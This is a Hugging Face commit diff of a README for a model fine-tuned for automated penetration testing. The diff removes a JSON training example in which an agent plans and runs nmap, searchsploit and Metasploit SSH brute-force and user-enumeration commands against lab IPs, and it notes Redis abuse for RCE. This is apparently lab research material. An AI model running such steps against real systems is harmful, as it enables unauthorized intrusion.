Hugging Face's logo

Nielzac
/
Qwen3-1.7B-unsloth-RESK-1

Transformers
Safetensors
English
text-generation-inference
unsloth
qwen3
trl
Model card Files
xet
Community
Nielzac commited on
Commit
427933b
·
verified ·
1 Parent(s): dbf7781

Update README.md

Browse files
Files changed (1) hide show
  1. README.md +2 -325
README.md CHANGED
@@ -57,332 +57,9 @@ The model is designed to perform **automated penetration testing** by simulating
57
 
58
  ## Dataset Example
59
  - **Goal**: Exploit vulnerabilities in OpenSSH 7.2p2 on port 22 to gain initial access, then assess Redis on port 6383 for unauthenticated data exposure and potential lateral movement.
60
- - **Prompt Example**:
61
-
62
- ```
63
- {
64
- "scenario_id": "001",
65
- "pre_attack_discussion": [
66
- "Check for known vulnerabilities in OpenSSH 7.2p2 using searchsploit.",
67
- "Can Redis on port 6383 be accessed without authentication, and what data is exposed?",
68
- "Determine if OpenSSH supports weak encryption or authentication methods via nmap scripts."
69
- ],
70
- "goal": "\"Given the outdated OpenSSH 7.2p2 on port 22, the primary goal is to exploit known vulnerabilities to gain initial access, then assess Redis on port 6383 for unauthenticated data exposure and potential lateral movement.\"",
71
- "thinking": [
72
- "<think>OpenSSH 7.2p2 has multiple known vulnerabilities, including username enumeration (CVE-2016-6210). I should first attempt to enumerate valid usernames using exploits like `linux/remote/40136.py` or `linux/remote/40113.txt` to identify potential targets for brute-forcing or credential stuffing.</think>",
73
- "<think>Since Redis (port 6383) is exposed but lacks public exploits, I should probe it for unauthenticated access. If Redis allows commands without auth, I could use `redis-cli` to dump keys, write SSH keys, or exploit misconfigurations like `CONFIG SET dir` for RCE—this could enable lateral movement if OpenSSH exploitation fails.</think>",
74
- "<think>If OpenSSH username enumeration succeeds but no valid credentials are found, I might combine it with a weak password attack (e.g., hydra) using common credentials. Alternatively, if Redis is unprotected, I could pivot to exploiting it first and then use Redis to gain a foothold (e.g., writing a cron job or SSH key).</think>"
75
- ],
76
- "reconnaissance": [
77
- {
78
- "command": "nmap -sV -p 22 10.5.57.3",
79
- "tool": "nmap",
80
- "parsed_args": [
81
- "-sV",
82
- "-p",
83
- "22",
84
- "10.5.57.3"
85
- ],
86
- "result": "Starting Nmap 7.80 ( https://nmap.org ) at 2025-05-18 16:15 UTC\nNmap scan report for 10.5.57.3\nHost is up (0.0029s latency).\n\nPORT STATE SERVICE VERSION\n22/tcp open ssh\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 2.03 seconds",
87
- "execution_time": 2.215498,
88
- "target": "target_001",
89
- "success": false
90
- },
91
- {
92
- "command": "searchsploit OpenSSH 7.2p2",
93
- "tool": "searchsploit",
94
- "parsed_args": [
95
- "OpenSSH",
96
- "7.2p2"
97
- ],
98
- "result": "---------------------------------------------- ---------------------------------\n Exploit Title | Path\n---------------------------------------------- ---------------------------------\nOpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py\nOpenSSH 2.3 < 7.7 - Username Enumeration (PoC | linux/remote/45210.py\nOpenSSH 7.2 - Denial of Service | linux/dos/40888.py\nOpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py\nOpenSSH < 7.4 - 'UsePrivilegeSeparation Disab | linux/local/40962.txt\nOpenSSH < 7.4 - agent Protocol Arbitrary Libr | linux/remote/40963.txt\nOpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py\nOpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt\n---------------------------------------------- ---------------------------------\nShellcodes: No Results",
99
- "execution_time": 0.508459,
100
- "target": "target_001",
101
- "success": false
102
- },
103
- {
104
- "command": "nmap -sV -p 6383 10.5.54.4",
105
- "tool": "nmap",
106
- "parsed_args": [
107
- "-sV",
108
- "-p",
109
- "6383",
110
- "10.5.54.4"
111
- ],
112
- "result": "Starting Nmap 7.80 ( https://nmap.org ) at 2025-05-18 16:15 UTC\nNmap scan report for 10.5.54.4\nHost is up (0.0010s latency).\n\nPORT STATE SERVICE VERSION\n6383/tcp open unknown\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 1.99 seconds",
113
- "execution_time": 2.079761,
114
- "target": "target2_001",
115
- "success": false
116
- },
117
- {
118
- "command": "searchsploit Redis 7.2.3",
119
- "tool": "searchsploit",
120
- "parsed_args": [
121
- "Redis",
122
- "7.2.3"
123
- ],
124
- "result": "Exploits: No Results\nShellcodes: No Results",
125
- "execution_time": 0.378564,
126
- "target": "target2_001",
127
- "success": false
128
- },
129
- {
130
- "command": "msfconsole -q -x \"search OpenSSH 7.2p2; exit\"",
131
- "tool": "metasploit_search",
132
- "parsed_args": [
133
- "-q",
134
- "-x",
135
- "search OpenSSH 7.2p2; exit"
136
- ],
137
- "result": "[-] No results from search",
138
- "execution_time": 10.391719,
139
- "target": "target_001",
140
- "success": true,
141
- "recon_type": "exploit_search_activity"
142
- },
143
- {
144
- "command": "msfconsole -q -x \"show exploits; exit\"",
145
- "tool": "metasploit_show_exploits",
146
- "parsed_args": [
147
- "-q",
148
- "-x",
149
- "show exploits; exit"
150
- ],
151
- "result": "Exploits\n========\n\n # Name Disclosure Date Rank Check Description\n - ---- --------------- ---- ----- -----------\n 0 exploit/aix/local/ibstat_path 2013-09-24 excellent Yes ibstat $PATH Privilege Escalation\n 1 exploit/aix/local/invscout_rpm_priv_esc 2023-04-24 excellent Yes invscout RPM Privilege Escalation\n 2 exploit/aix/local/xorg_x11_server 2018-10-25 great Yes Xorg X11 Server Local Privilege Escalation\n 3 exploit/aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow\n 4 exploit/aix/rpc_ttdbserverd_realpath 2009-06-17 great No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)\n 5 exploit/android/adb/adb_server_exec 2016-01-01 excellent Yes Android ADB Debug Server Remote Payload Execution\n 6 exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE\n 7 exploit/android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal No Android Stagefright MP4 tx3g Integer Overflow\n 8 exploit/android/browser/webview_addjavascriptinterface 2012-12-21 excellent No Android Browser and WebView addJavascriptInterface Code Execution\n 9 exploit/android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good No Adobe Reader for Android addJavascriptInterface Exploit\n 10 exploit/android/local/binder_uaf 2019-09-26 excellent No Android Binder Use-After-Free Exploit\n 11 exploit/android/local/futex_requeue 2014-05-03 excellent Yes Android 'Towelroot' Futex Requeue Kernel Exploit\n 12 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass\n 13 exploit/android/local/put_user_vroot 2013-09-06 excellent No Android get_user/put_user Exploit\n 14 exploit/android/local/su_exec 2017-08-31 manual No Android 'su' Privilege Escalation\n 15 exploit/apple_ios/browser/safari_jit 2016-08-25 good No Safari Webkit JIT Exploit for iOS 7.1.2\n 16 exploit/apple_ios/browser/safari_libtiff 2006-08-01 good No Apple iOS MobileSafari LibTIFF Buffer Overflow\n 17 exploit/apple_ios/browser/webkit_createthis 2018-03-15 manual No Safari Webkit Proxy Object Type Confusion\n 18 exploit/apple_ios/browser/webkit_trident 2016-08-25 manual No WebKit not_number defineProperties UAF\n 19 exploit/apple_ios/email/mobilemail_libtiff 2006-08-01 good No Apple iOS MobileMail LibTIFF Buffer Overflow\n 20 exploit/apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent No Apple iOS Default SSH Password Vulnerability\n 21 exploit/bsd/finger/morris_fingerd_bof ",
152
- "execution_time": 11.811134,
153
- "target": "target_001",
154
- "success": true,
155
- "recon_type": "exploit_search_activity"
156
- },
157
- {
158
- "command": "searchsploit OpenSSH 7.2p2",
159
- "tool": "searchsploit_search",
160
- "parsed_args": [
161
- "OpenSSH",
162
- "7.2p2"
163
- ],
164
- "result": "---------------------------------------------- ---------------------------------\n Exploit Title | Path\n---------------------------------------------- ---------------------------------\nOpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py\nOpenSSH 2.3 < 7.7 - Username Enumeration (PoC | linux/remote/45210.py\nOpenSSH 7.2 - Denial of Service | linux/dos/40888.py\nOpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py\nOpenSSH < 7.4 - 'UsePrivilegeSeparation Disab | linux/local/40962.txt\nOpenSSH < 7.4 - agent Protocol Arbitrary Libr | linux/remote/40963.txt\nOpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py\nOpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt\n---------------------------------------------- ---------------------------------\nShellcodes: No Results",
165
- "execution_time": 0.505261,
166
- "target": "target_001",
167
- "success": true,
168
- "recon_type": "exploit_search_activity"
169
- }
170
- ],
171
- "exploitation": [
172
- {
173
- "command": "msfconsole -q -x \"use auxiliary/scanner/ssh/ssh_login; set RHOSTS 10.5.57.3; set RPORT 22; set USERNAME admin; set PASSWORD password; run\"",
174
- "tool": "msfconsole",
175
- "parsed_args": [
176
- "-q",
177
- "-x",
178
- "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 10.5.57.3; set RPORT 22; set USERNAME admin; set PASSWORD password; run"
179
- ],
180
- "result": "RHOSTS => 10.5.57.3\nRPORT => 22\nUSERNAME => admin\nPASSWORD => password\n[*] 10.5.57.3:22 - Starting bruteforce\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf6 auxiliary(scanner/ssh/ssh_login) > \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b",
181
- "execution_time": 25.230254,
182
- "target": "target_001",
183
- "success": false,
184
- "attempt_type": "msf_candidate_attempt:_auxiliary/scanner/ssh/ssh_logi",
185
- "msf_details": {
186
- "module": "auxiliary/scanner/ssh/ssh_login",
187
- "payload": null,
188
- "options": {
189
- "RHOSTS": "10.5.57.3",
190
- "RPORT": "22",
191
- "USERNAME": "admin",
192
- "PASSWORD": "password"
193
- }
194
- }
195
- },
196
- {
197
- "command": "msfconsole -q -x \"use auxiliary/scanner/ssh/ssh_enumusers; set RHOSTS 10.5.57.3; set RPORT 22; set USER_FILE /usr/share/wordlists/common_users.txt; run\"",
198
- "tool": "msfconsole",
199
- "parsed_args": [
200
- "-q",
201
- "-x",
202
- "use auxiliary/scanner/ssh/ssh_enumusers; set RHOSTS 10.5.57.3; set RPORT 22; set USER_FILE /usr/share/wordlists/common_users.txt; run"
203
- ],
204
- "result": "[*] Using action Malformed Packet - view all 2 actions with the show actions command\nRHOSTS => 10.5.57.3\nRPORT => 22\nUSER_FILE => /usr/share/wordlists/common_users.txt\n[-] Msf::OptionValidateError One or more options failed to validate: USER_FILE.\nmsf6 auxiliary(scanner/ssh/ssh_enumusers) > \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b",
205
- "execution_time": 10.834587,
206
- "target": "target_001",
207
- "success": false,
208
- "attempt_type": "deepseek_suggested_generic_or_msf_json",
209
- "msf_details": {
210
- "module": "auxiliary/scanner/ssh/ssh_enumusers",
211
- "payload": "",
212
- "options": {
213
- "RHOSTS": "10.5.57.3",
214
- "RPORT": "22",
215
- "USER_FILE": "/usr/share/wordlists/common_users.txt"
216
- }
217
- }
218
- },
219
- {
220
- "command": "msfconsole -q -x \"use auxiliary/scanner/ssh/ssh_enumusers; set RHOSTS 10.5.57.3; set RPORT 22; set USER_FILE /usr/share/wordlists/common_users.txt; set THREADS 5; run\"",
221
- "tool": "msfconsole",
222
- "parsed_args": [
223
- "-q",
224
- "-x",
225
- "use auxiliary/scanner/ssh/ssh_enumusers; set RHOSTS 10.5.57.3; set RPORT 22; set USER_FILE /usr/share/wordlists/common_users.txt; set THREADS 5; run"
226
- ],
227
- "result": "[*] Using action Malformed Packet - view all 2 actions with the show actions command\nRHOSTS => 10.5.57.3\nRPORT => 22\nUSER_FILE => /usr/share/wordlists/common_users.txt\nTHREADS => 5\n[-] Msf::OptionValidateError One or more options failed to validate: USER_FILE.\nmsf6 auxiliary(scanner/ssh/ssh_enumusers) > \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b",
228
- "execution_time": 12.954575,
229
- "target": "target_001",
230
- "success": false,
231
- "attempt_type": "deepseek_suggested_generic_or_msf_json",
232
- "msf_details": {
233
- "module": "auxiliary/scanner/ssh/ssh_enumusers",
234
- "payload": "",
235
- "options": {
236
- "RHOSTS": "10.5.57.3",
237
- "RPORT": "22",
238
- "USER_FILE": "/usr/share/wordlists/common_users.txt",
239
- "THREADS": "5"
240
- }
241
- }
242
- }
243
- ],
244
- "privilege_escalation": [],
245
- "dapo_attack_path": [
246
- {
247
- "id": "node1",
248
- "label": {
249
- "en": "Nmap Scan",
250
- "fr": "Scan Nmap"
251
- },
252
- "type": "reconnaissance",
253
- "tool": "nmap",
254
- "service": "openssh",
255
- "port": "22",
256
- "connections": [
257
- "node2"
258
- ]
259
- },
260
- {
261
- "id": "node2",
262
- "label": {
263
- "en": "Searchsploit Scan",
264
- "fr": "Scan Searchsploit"
265
- },
266
- "type": "reconnaissance",
267
- "tool": "searchsploit",
268
- "service": "openssh",
269
- "port": "22",
270
- "connections": [
271
- "node3"
272
- ]
273
- },
274
- {
275
- "id": "node3",
276
- "label": {
277
- "en": "Nmap Scan",
278
- "fr": "Scan Nmap"
279
- },
280
- "type": "reconnaissance",
281
- "tool": "nmap",
282
- "service": "openssh",
283
- "port": "22",
284
- "connections": [
285
- "node4"
286
- ]
287
- },
288
- {
289
- "id": "node4",
290
- "label": {
291
- "en": "Searchsploit Scan",
292
- "fr": "Scan Searchsploit"
293
- },
294
- "type": "reconnaissance",
295
- "tool": "searchsploit",
296
- "service": "openssh",
297
- "port": "22",
298
- "connections": [
299
- "node5"
300
- ]
301
- },
302
- {
303
- "id": "node5",
304
- "label": {
305
- "en": "Msfconsole Scan",
306
- "fr": "Scan Msfconsole"
307
- },
308
- "type": "reconnaissance",
309
- "tool": "msfconsole",
310
- "service": "openssh",
311
- "port": "22",
312
- "connections": [
313
- "node6"
314
- ]
315
- },
316
- {
317
- "id": "node6",
318
- "label": {
319
- "en": "Msfconsole Scan",
320
- "fr": "Scan Msfconsole"
321
- },
322
- "type": "reconnaissance",
323
- "tool": "msfconsole",
324
- "service": "openssh",
325
- "port": "22",
326
- "connections": [
327
- "node7"
328
- ]
329
- },
330
- {
331
- "id": "node7",
332
- "label": {
333
- "en": "Searchsploit Scan",
334
- "fr": "Scan Searchsploit"
335
- },
336
- "type": "reconnaissance",
337
- "tool": "searchsploit",
338
- "service": "openssh",
339
- "port": "22",
340
- "connections": [
341
- "node8"
342
- ]
343
- }
344
- ],
345
- "dapo_rewards": {
346
- "score": 6.0,
347
- "rewards": {
348
- "base": 4.499999999999999,
349
- "time": -7.6909812,
350
- "criticality": 0.0
351
- },
352
- "total_reward": -3.19
353
- },
354
- "metadata": {
355
- "scenario_id": 1,
356
- "service": "OpenSSH",
357
- "version": "7.2p2",
358
- "port": 2222,
359
- "vulnerable": true,
360
- "rl_reward_base": 2.0,
361
- "rl_reward_time": 1.046017568031338,
362
- "rl_reward_criticality": 1.0,
363
- "dapo_flag": true,
364
- "has_secondary_target": true,
365
- "secondary_target": {
366
- "service": "Redis",
367
- "version": "7.2.3",
368
- "port": 6380,
369
- "vulnerable": false
370
- },
371
- "synthetic_details": {
372
- "primary_target_original_ip": "10.5.55.3",
373
- "primary_target_new_ip": "10.5.57.3",
374
- "primary_target_original_port": "2222",
375
- "primary_target_new_port": "22",
376
- "target2_001_original_ip": "10.5.55.4",
377
- "target2_001_new_ip": "10.5.54.4",
378
- "target2_001_original_port": "6380",
379
- "target2_001_new_port": "6383"
380
- }
381
- }
382
- },
383
- ```
384
-
385
 
 
 
386
 
387
  # Uploaded model
388
 
 
57
 
58
  ## Dataset Example
59
  - **Goal**: Exploit vulnerabilities in OpenSSH 7.2p2 on port 22 to gain initial access, then assess Redis on port 6383 for unauthenticated data exposure and potential lateral movement.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
60
 
61
+ ## Dataset
62
+ Trained on [Nielzac/cybersecurity-sft-dataset](https://huggingface.co/datasets/Nielzac/cybersecurity-sft-dataset), containing prompts and responses for cybersecurity scenarios, filtered to exclude failed commands.
63
 
64
  # Uploaded model
65